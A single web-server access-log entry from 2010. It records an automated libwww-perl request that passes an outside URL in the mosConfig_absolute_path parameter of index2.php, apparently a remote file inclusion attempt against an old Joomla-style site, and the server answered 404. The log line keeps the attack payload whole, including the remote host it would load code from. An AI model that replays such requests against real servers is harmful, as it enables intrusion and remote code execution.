78.110.50.120 - - [15/Feb/2010:01:23:18 -0500] "GET /logs/access_log.Q110020300/index2.php?option=com_search&Itemid=&func=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
